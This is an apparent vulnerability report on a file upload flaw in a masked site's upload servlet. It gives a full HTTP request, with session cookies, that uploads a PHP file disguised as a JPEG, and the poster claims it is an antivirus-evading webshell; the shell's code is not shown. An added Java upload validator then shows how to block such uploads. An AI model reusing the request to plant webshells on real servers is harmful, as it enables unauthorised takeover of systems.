URL: https://**.**.**.**/res/active/4G/upload.jsp (login required). File upload vulnerability. Security software is also installed, so it killed all of my webshells.


But that is not the point. The point is that I got one that evades the antivirus.


First, upload a small webshell
 

POST https://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 1912
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360EE
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytrI8QHebOAmXLH47
Referer: https://**.**.**.**/service/upload/img_upload.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: s_fid=7BC739F3593E85F7-08481DCFE53A3A4E; lvid=1d399cc664257927153a6c35ee4ff517; nvid=1; cityCode=bj; SHOPID_COOKIEID=10001; NETJSESSIONID1=mZB6WVKBzT2FHtMzJQsQHL2XKwXnptCVV6d8TGW5Hpwmnwz0DJvt!1311323526; _pk_ref.345.1592=%5B%22%22%2C%22%22%2C1448462879%2C%22https%3A%2F%2F**.**.**.**%2Flink%3Furl%3DAdVaFcKcHEIDY_dgfI7lFNi07sx14l5wvtP6LLBt1KfJf4ocSDar9jooSmBxFHkx4XLQLPYBXj_lg5viFvr1ya%26wd%3D%26eqid%3Df78656fa000104b7000000045655c9fe%22%2C%220%22%5D; Hm_lvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462879; Hm_lpvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462910; _pk_id.345.1592=c1efc092521c47e5.1448462879.1.1448462910.1448462879.; _pk_ses.345.1592=*

------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form-data; name="uploadFile"; filename="240.php"
Content-Type: image/jpeg
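
The request above declares Content-Type: image/jpeg for a part named 240.php, so a server that trusts the client's Content-Type or keeps the client's filename will store a script. The following is an added example, not code from the original post or from the affected application: a server-side check a Java upload handler could call before writing the file. The class name UploadCheck, the method accept, and the sample byte arrays are assumptions constructed for illustration.

```java
import java.nio.charset.StandardCharsets;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;

public class UploadCheck {
    // Allowlisted extensions mapped to the bytes a real file of that type starts with.
    private static final Map<String, byte[]> MAGIC = Map.of(
        "jpg",  new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "jpeg", new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "png",  new byte[]{(byte) 0x89, 'P', 'N', 'G'},
        "gif",  new byte[]{'G', 'I', 'F', '8'});

    /** Returns a server-generated storage name, or null if the upload must be rejected.
     *  The client-declared Content-Type is deliberately not an input. */
    static String accept(String clientFilename, byte[] content) {
        if (clientFilename == null || content == null) return null;
        // Drop any path component supplied by the client.
        int slash = Math.max(clientFilename.lastIndexOf('/'), clientFilename.lastIndexOf('\\'));
        String base = clientFilename.substring(slash + 1);
        int dot = base.lastIndexOf('.');
        if (dot < 0 || base.indexOf('\0') >= 0) return null;
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        byte[] magic = MAGIC.get(ext);
        // Extension is not on the allowlist (php, jsp, jspx, ...) or file is too short.
        if (magic == null || content.length < magic.length) return null;
        for (int i = 0; i < magic.length; i++) {
            // Content does not match what the extension claims.
            if (content[i] != magic[i]) return null;
        }
        // Never reuse the client's name on disk.
        return UUID.randomUUID() + "." + ext;
    }

    public static void main(String[] args) {
        // Constructed sample inputs: a JPEG header and a non-image placeholder.
        byte[] jpeg = {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF, (byte) 0xE0, 0, 0x10};
        byte[] text = "placeholder, not an image".getBytes(StandardCharsets.US_ASCII);
        System.out.println("240.php + jpeg bytes -> " + accept("240.php", jpeg));
        System.out.println("a.jpg + text bytes   -> " + accept("a.jpg", text));
        System.out.println("a.JPG + jpeg bytes   -> " + accept("a.JPG", jpeg));
    }
}
```

Magic bytes alone do not prove a file is harmless, so the accepted file should also be stored in a directory the application server does not execute scripts from.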